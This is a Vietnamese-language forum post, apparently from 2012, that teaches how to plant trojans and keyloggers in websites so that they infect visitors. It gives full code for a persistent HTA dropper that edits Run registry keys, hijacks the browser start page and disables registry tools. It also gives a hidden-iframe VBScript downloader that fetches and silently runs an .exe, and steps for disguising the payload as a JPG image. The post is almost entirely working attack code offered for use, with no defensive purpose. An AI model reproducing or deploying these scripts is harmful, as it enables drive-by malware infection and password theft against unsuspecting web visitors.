Search
 
 

Display results as :
 


Rechercher Advanced Search

Latest topics
» Tuyệt Kỹ Đong Giai Chân Kinh (tuyệt Kỹ cua trai)
Gắn trojan, keylog, virus vào website, forum  EmptyThu Aug 23, 2012 5:38 am by Admin

» Tuyệt kỹ cua giai
Gắn trojan, keylog, virus vào website, forum  EmptyThu Aug 23, 2012 5:36 am by Admin

» NETCAT.........
Gắn trojan, keylog, virus vào website, forum  EmptyMon Aug 13, 2012 6:35 am by Admin

» Bảo mật CSDL bằng phương pháp mã hóa.
Gắn trojan, keylog, virus vào website, forum  EmptyTue Apr 17, 2012 10:04 pm by Admin

» Hàm mã hóa MD5 bằng JavaScript
Gắn trojan, keylog, virus vào website, forum  EmptyTue Apr 17, 2012 10:03 pm by Admin

» Giá của món quà
Gắn trojan, keylog, virus vào website, forum  EmptyFri Apr 13, 2012 6:01 am by Admin

» Sẽ chỉ yêu ai?
Gắn trojan, keylog, virus vào website, forum  EmptyFri Apr 13, 2012 6:01 am by Admin

» Cách đọc bảng chữ cái!
Gắn trojan, keylog, virus vào website, forum  EmptyThu Apr 12, 2012 10:37 pm by Admin

» Gắn trojan, keylog, virus vào website, forum
Gắn trojan, keylog, virus vào website, forum  EmptyTue Apr 10, 2012 1:14 am by Admin

Affiliates
free forum

Gắn trojan, keylog, virus vào website, forum

Tue Apr 10, 2012 1:14 am by Admin

Cách 1 :
Cách đính kèm trojan vào website
Một số cách phổ biến đính kèm trojon vào website như dùng mã javascript hay dùng phần mềm ..
Xin giới thiệu với các bạn 1 số cách
a, Dùng 1 đoạn mã javascript để mở và phát tán trojan
Code:
<script language=javascript>
open(”địa chỉ con trojan”);
</SCRIPT>

Đoạn mã trên bạn chèn vào thẻ body của 1 trang website,khi nạn nhân mở website trojan sẽ mở ra và yêu cầu người lướt website mở ra

b, bạn copy vào notepad đoạn mã sau:

Code:
<html>
<head>
<script language=”javascript”>
try {
var fso = new ActiveXObject(”Scripting.FileSystemObject”);
var Shell = new ActiveXObject(”WScript.Shell”);
var tfolder2 = fso.GetSpecialFolder(0);
var filepath2 = tfolder2 + “\\system32\\System.js”;
var a2 = fso.CreateTextFile(filepath2, true);
a2.WriteLine(’var url = “Địa chỉ trojon”;’);
a2.WriteLine(’var burl = “Địa chỉ trojon”;’);
a2.WriteLine(’var fso = new ActiveXObject(”Scripting.FileSystemObject”);� �);
a2.WriteLine(’var tfolder = fso.GetSpecialFolder(0);’);
a2.WriteLine(’var filepath = tfolder + “\\\\system32\\\\System.js”;’);
a2.WriteLine(’var Shell = new ActiveXObject(”WScript.Shell”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\ \\\Windows”,filepath);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\S ystem32″,filepath);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page”,url);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1″,url);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Dia chi con trojan”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1″);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’);
a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software \\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies \\\\System\\\\DisableRegistryTools”,1,”REG_DWO RD”) ;’);
a2.Close();
Shell.Run(filepath2);
}
catch (e){}
</script>
<HTA:APPLICATION WINDOWSTATE=’minimize’ SHOWINTASKBAR=’no’ />
</head>
<body onload=’window.close()’>
</body>
</html>


rồi save lại với tên là : trojan.hta
bạn gắn đoạn mã sau vào cuối cùng của website của bạn:

Code:
<center>
<span datasrc=”#oRun” datafld=”view” dataformatas=”html”></span>
<xml id=”oRun”>
<preview>
<view>
<![CDATA[
<object id="oFile" data="trojan.hta?id=1"></object>
]]>
</view>
</preview>
</xml>
</center>
</body>
</html>


rồi sau đó bạn upload file trojan.hta với website của bạn lên cùng 1 mỗi lần mở website của bạn con trojan sẽ tự open vào trong hệ thống mà không hề bị phát hiện
Cách 2:
đoạn đầu đưa vào diễn đàn là 01 frame

Code:
<iframe width=”0″ height=”0″ src=”http://link chứa đoạn mã bên dưới”></iframe>


đoạn 2

Code:
<script language=”VBScript”>
on error resume next
dl = “Đường dẫn con Virus dạng .exe”
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,””)
a1=”Ado”
a2=”db.”
a3=”Str”
a4=”eam”
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,””)
S.type = 1
str6=”GET”
x.Open str6, dl, False
x.Send
fname1=”bl4ck.com”
set F = df.createobject(”Scripting.FileSystemObject”,� ��”)
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(”Shell.Application”,””)
Q.ShellExecute fname1,””,””,”open”,0
</script>


Cách 3 :
Đầu tiên , mọi người hãy Download Program http://rapidshare.com/files/176989280/exe2vbs (sau khi Down về xong nhớ gắn thêm .zip rồi bung nén)
Đây là chương trình giúp bạn Convert sang “*.hta
Đầu tiên các bạn sử dụng EXE2VBS để convert file trojan của mình ( chẳng hạn tôi sẽ xài 1 con MagicPS => để lấy pass của người Victim truy cập ), click vào file trojan kéo vô khung exe của exe2vbs ===> các bạn sẽ được 1 file *.js ! Okie giờ edit lại một chút để thành file hta ( định dạng html thực thi để chạy các activeX ) Chú ý khi chạy exe2vbs trong phần lực chọn có 3 ô các bạn đánh dấu vào 2 mục trên thôi
Mở file trojan.exe.js vừa convert ra bằng notepad or wordpad, cho thêm dòng

Code:
<script language=vbs>


vào trên cùng Xuống dưới cùng thay dòng:
Code:
WScript.CreateObject(”WScript.Shell”).run(pth)


bằng

Code:
Set Shell1 = CreateObject(”WScript.Shell”) Shell1.Run(pth) </script> <HTA:APPLICATION WINDOWSTATE=’minimize’ SHOWINTASKBAR=’no’ /> </head> <body onload=’window.close()’> </body> </html>


Sau đó save lại thành file trojan.hta Sau đó mở file web của bạn cho Victim truy cập ra thêm code này vào để run file trojan.hta

Code:
<center> <span datasrc=”#oRun” datafld=”view” dataformatas=”html”></span> <xml id=”oRun”> <preview> <view> <![CDATA[ <object id="oFile" data="trojan.hta?id=1"></object> ]]> </view> </preview> </xml> </center> </body> </html>


để tên File có dạng File ảnh (JPG , GIF ,BMP …) :
Theo cách 2 , mở Notepad :

Code:
<script language=”VBScript”>
on error resume next
dl = “Đường dẫn con Virus dạng .exe”
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,””)
a1=”Ado”
a2=”db.”
a3=”Str”
a4=”eam”
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,””)
S.type = 1
str6=”GET”
x.Open str6, dl, False
x.Send
fname1=”bl4ck.com”
set F = df.createobject(”Scripting.FileSystemObject”,� ��”)
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(”Shell.Application”,””)
Q.ShellExecute fname1,””,””,”open”,0
</script>


Save lại dưới dạng “tên File.JPG” hay . GIF tùy ý .
Ví dụ : funy.JPG
Mở File funy.JPG vừa Save song bằng Font Page , nhấp chọn Instert Picture rồi cho bừa 1 bức ảnh để đỡ nghi ngờ . File - Save , Upload File funy.JPG vừa rồi lên .
Giờ thì nó trông như 1 bức ảnh thật , có khi họ còn không nghi ngờ là có trojan trong đó nữa .



Comments: 0

Statistics
We have 68 registered users
The newest registered user is noiduong

Our users have posted a total of 803 messages in 729 subjects
Who is online?
In total there are 12 users online :: 0 Registered, 0 Hidden and 12 Guests

None

[ View the whole list ]


Most users ever online was 46 on Wed Oct 30, 2013 8:31 pm